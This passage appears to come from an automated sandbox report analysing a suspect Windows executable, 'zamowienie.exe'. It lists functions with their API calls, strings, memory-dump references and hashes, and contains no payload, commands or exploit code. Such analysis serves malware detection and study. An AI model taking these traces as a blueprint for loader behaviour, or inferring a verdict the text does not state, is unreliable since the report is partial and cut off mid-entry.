                                                                                                                                              • Instruction Fuzzy Hash: 76A16FB1A01209ABDB11AFA5CD45BAF77B8EF84314F10803BF601B62D1D77C9A418B6D
                                                                                                                                              Function 73401B28 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 734012A5: GlobalAlloc.KERNEL32(?,734012C3,?,7340135F,-7340504B,734011C0,-000000A0), ref: 734012AD
                                                                                                                                              • GlobalAlloc.KERNEL32(?,000014A4), ref: 73401C54
                                                                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 73401C9C
                                                                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 73401CA6
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73401CB9
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401D99
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401D9E
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 73401DA3
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73401F8A
                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 73402128
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000008), ref: 734021A4
                                                                                                                                              • LoadLibraryA.KERNEL32(00000008), ref: 734021B5
                                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 7340220E
                                                                                                                                              • lstrlenA.KERNEL32(00000408), ref: 73402228
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469810438.0000000073404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2469862791.0000000073406000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_73400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 245916457-0
                                                                                                                                              • Opcode ID: 603b57035bbbe0a21eb7e7effc595f72e7ac09fe7ac7a33cb47aecaa36af7403
                                                                                                                                              • Instruction ID: 8947829940f61a83e6a102c7ac974d3c761582a0bfdbca04397e61e572bbd683
                                                                                                                                              • Opcode Fuzzy Hash: 603b57035bbbe0a21eb7e7effc595f72e7ac09fe7ac7a33cb47aecaa36af7403
                                                                                                                                              • Instruction Fuzzy Hash: 7822AC79F0420ADFDB1A9FA4C9807ADBBF5BF04304F1485BED1A6A22C0E7749542CB58
                                                                                                                                              Function 004027CF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                              • Opcode ID: 23a51d4048371150d615cd00007c864c0cc535fd28d0437de54ccd7a3f6eddd4
                                                                                                                                              • Instruction ID: a10ff3317a7d934d21c6305b1d4d8d4805c4e4a6efc72f35853891d037137daf
                                                                                                                                              • Opcode Fuzzy Hash: 23a51d4048371150d615cd00007c864c0cc535fd28d0437de54ccd7a3f6eddd4
                                                                                                                                              • Instruction Fuzzy Hash: 47F0A771604110DFDB50E7A49E49BEE7768AF61314F60017BE141B20C1C6B849529B2E
                                                                                                                                              Function 004045C9 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404654
                                                                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404668
                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404686
                                                                                                                                              • GetSysColor.USER32(?), ref: 00404697
                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004046A6
                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004046B5
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 004046B8
                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004046C7
                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004046DC
                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040473E
                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00404741
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040476C
                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004047AC
                                                                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004047BB
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004047C4
                                                                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 004047DA
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004047DD
                                                                                                                                              • SendMessageA.USER32(00000111,?,00000000), ref: 00404809
                                                                                                                                              • SendMessageA.USER32(?,00000000,00000000), ref: 0040481D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                              • String ID: N$2B
                                                                                                                                              • API String ID: 3103080414-1121222966
                                                                                                                                              • Opcode ID: 7cb1176b9ae3df423583a4a74213cbd08614faf154a1fa0b6702d6320ba665e9
                                                                                                                                              • Instruction ID: a956e5cdcbf2e50c8e6c44eb6f4afbdf7eb35750e57dac182b9c4216c90322c5
                                                                                                                                              • Opcode Fuzzy Hash: 7cb1176b9ae3df423583a4a74213cbd08614faf154a1fa0b6702d6320ba665e9
                                                                                                                                              • Instruction Fuzzy Hash: 3361B2B1A00208BBDB10AF61DD45F6A7B69EB84715F10843AFB04BA1D1C7B8A951CF98
                                                                                                                                              Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                              • DrawTextA.USER32(00000000,Noncomplacency,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                              • String ID: F$Noncomplacency
                                                                                                                                              • API String ID: 941294808-1629299209
                                                                                                                                              • Opcode ID: fd3c55e467a7729ccf7c85589dbda29c4605c5292bdc4fc1e7e332042d628291
                                                                                                                                              • Instruction ID: 940e876990e797217803a3edca5eb74fa4908c9b1d1368a1209cd74081a255fd
                                                                                                                                              • Opcode Fuzzy Hash: fd3c55e467a7729ccf7c85589dbda29c4605c5292bdc4fc1e7e332042d628291
                                                                                                                                              • Instruction Fuzzy Hash: 03419C71400209AFCB058F95DE459BFBBB9FF44314F00842EF991AA1A0C738DA54DFA4
                                                                                                                                              Function 00406027 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,004061B8,?,?), ref: 00406058
                                                                                                                                              • GetShortPathNameA.KERNEL32(?,004226E0,00000400), ref: 00406061
                                                                                                                                                • Part of subcall function 00405EB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EC6
                                                                                                                                                • Part of subcall function 00405EB6: lstrlenA.KERNEL32(00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EF8
                                                                                                                                              • GetShortPathNameA.KERNEL32(?,00422AE0,00000400), ref: 0040607E
                                                                                                                                              • wsprintfA.USER32 ref: 0040609C
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00422AE0,C0000000,?,00422AE0,?,?,?,?,?), ref: 004060D7
                                                                                                                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060E6
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040611E
                                                                                                                                              • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004222E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406174
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406185
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040618C
                                                                                                                                                • Part of subcall function 00405F51: GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                                • Part of subcall function 00405F51: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                              • String ID: %s=%s$[Rename]$&B$*B$*B
                                                                                                                                              • API String ID: 2171350718-779947378
                                                                                                                                              • Opcode ID: c4bbbc6b5610b33bf20e07bc27bb868b4785a2ec59af68f78f2043699e73542c
                                                                                                                                              • Instruction ID: 78461ed7e01e7e31242775e142b73458963c91f0d447217c52df7d32ebdc713a
                                                                                                                                              • Opcode Fuzzy Hash: c4bbbc6b5610b33bf20e07bc27bb868b4785a2ec59af68f78f2043699e73542c
                                                                                                                                              • Instruction Fuzzy Hash: 9C312331200716BBC2206B659D48F6B3A5CDF45754F16003AFE46BA2C3EA7CE91586BD
                                                                                                                                              Function 00405502 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                              • lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                              • lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                              • SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                              • String ID: Y/@
                                                                                                                                              • API String ID: 2531174081-4176262608
                                                                                                                                              • Opcode ID: bbe00a10e9b98f436442815a186a67565d49adff4bb54cd9c218e6a45670779c
                                                                                                                                              • Instruction ID: 4efac77835109b0bf7ba18c33a57f97505ea4ed4ab376d23d164ccb29a21cfd9
                                                                                                                                              • Opcode Fuzzy Hash: bbe00a10e9b98f436442815a186a67565d49adff4bb54cd9c218e6a45670779c
                                                                                                                                              • Instruction Fuzzy Hash: 80218971A00118BEDF119FA5DD80ADEBFFAEB04354F04807AF944A6291C7798A50CFA8
                                                                                                                                              Function 004066B8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406710
                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 0040671D
                                                                                                                                              • CharNextA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406722
                                                                                                                                              • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",004034CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?,0000000A,?), ref: 00406732
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004066B9
                                                                                                                                              • *?|<>/":, xrefs: 00406700
                                                                                                                                              • "C:\Users\user\Desktop\zamowienie.exe", xrefs: 004066B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                              • API String ID: 589700163-1210131728
                                                                                                                                              • Opcode ID: e3b32ff321b26b0a1dc254375672a9defa2cd2a2e06fedaefa84eb11869ec267
                                                                                                                                              • Instruction ID: af5db177912bc8cae02f22381079db2484517822171300cb794ff1974d687664
                                                                                                                                              • Opcode Fuzzy Hash: e3b32ff321b26b0a1dc254375672a9defa2cd2a2e06fedaefa84eb11869ec267
                                                                                                                                              • Instruction Fuzzy Hash: 821104518047A12AFB3216284C84BBBBF898F567A4F19087FD5C3732C2DA7D4C62976D
                                                                                                                                              Function 00402EE2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EFA
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F18
                                                                                                                                              • wsprintfA.USER32 ref: 00402F46
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F6A
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F78
                                                                                                                                                • Part of subcall function 00402EC6: MulDiv.KERNEL32(0004D64F,?,0004E10C), ref: 00402EDB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                              • String ID: ... %d%%$#VhJ.@
                                                                                                                                              • API String ID: 722711167-641327262
                                                                                                                                              • Opcode ID: a9b726a743a4a4a49eee2be659da90be19c786cf3da850da28c34197e21bf41e
                                                                                                                                              • Instruction ID: b5be8217fc920dbbb74492efed7bd9834ce299e20993dd740885a83f9790073e
                                                                                                                                              • Opcode Fuzzy Hash: a9b726a743a4a4a49eee2be659da90be19c786cf3da850da28c34197e21bf41e
                                                                                                                                              • Instruction Fuzzy Hash: A801C470542215EBC721ABA0EF0DEAF3A7CEB40745B10403BF901B21E4C6B89402DBED
                                                                                                                                              Function 004044C5 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 004044E2
                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404520
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040452C
                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404538
                                                                                                                                              • GetSysColor.USER32(?), ref: 0040454B
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040455B
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404575
                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 0040457F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                              • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                                                                                              • Instruction ID: cbb27419647cba54826f3dc27ddae425a6b229e77b97164b9c9b1d5840c2de7b
                                                                                                                                              • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                                                                                                                              • Instruction Fuzzy Hash: DB2137B1500704ABCB219F78DD48A577BF8AF45714B04893DEB96B26E0DB34D948CB54
                                                                                                                                              Function 73402568 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 734012A5: GlobalAlloc.KERNEL32(?,734012C3,?,7340135F,-7340504B,734011C0,-000000A0), ref: 734012AD
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 7340266E
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 734026A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2469658319.0000000073400000.00000002.00000001.01000000.00000005.sdmpDownload File
